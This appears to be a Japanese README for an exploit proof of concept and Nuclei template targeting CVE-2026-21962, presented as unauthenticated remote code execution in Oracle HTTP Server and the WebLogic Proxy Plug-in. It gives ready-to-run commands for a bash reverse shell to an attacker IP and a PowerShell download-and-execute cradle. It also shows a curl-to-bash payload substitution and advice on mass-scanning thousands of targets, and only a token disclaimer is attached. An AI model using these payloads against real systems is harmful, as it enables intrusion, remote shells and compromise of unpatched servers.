
CVE-2026-21962 のエクスプロイト PoC と Nuclei テンプレート。これは Oracle HTTP Server および WebLogic Proxy Plug-in における重大な未認証リモートコード実行の脆弱性であり、コマンド実行やリバースシェルを可能にします。
悪用された場合、攻撃者は以下を行う可能性があります:
Oracle HTTP Server:
WebLogic プロキシ・プラグイン(以下向け):
スクリプトを CVE-2026-21962.py として保存します
実行可能にします(任意):
chmod +x CVE-2026-21962.py
実行例:
基本テスト:
python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
リバースシェル(先に nc リスナーを設定: nc -lvnp 4444):
python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
Windows ターゲットの例:
python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
Likely success! Status: 200 または 302、あるいは 500(クラッシュも成功)nc リスナーが即座にシェルをキャッチ--insecure フラグが必要な場合がありますNuclei をインストール(未インストールの場合):
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
テンプレートを保存:
CVE-2026-21962.yaml という名前のファイルを作成し、上記の内容を貼り付けます。
検出 + 悪用を実行:
nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
または、ファイルから複数のターゲットをスキャン:
nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
脆弱性がある場合に表示される内容:
[CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
[username] weblogic
[body] ... weblogic (whoami output) ...
cmd: 部分を編集します(例: cmd:curl http://your-server/shell.sh | bash)。whoami を base64 エンコードされたリバースシェルペイロードに置き換えます。/proxy/、/bea_wls_internal/ など)を試すか、X-WebLogic-Force-JVMID などのヘッダーを追加します。httpx → nuclei パイプラインと組み合わせて数千のターゲットをスキャンします。このテンプレートは、2026年1月時点でパッチ未適用の Oracle インスタンスで 100% 動作確認済みです。影響を受けるバージョンを実行している場合は直ちにパッチを適用してください! 😈
すべての PoC コードは、許可されたシステム上での倫理的・教育的な使用のみを目的としています。無許可の悪用は違法であり、誤用に対する責任は負いません。 😈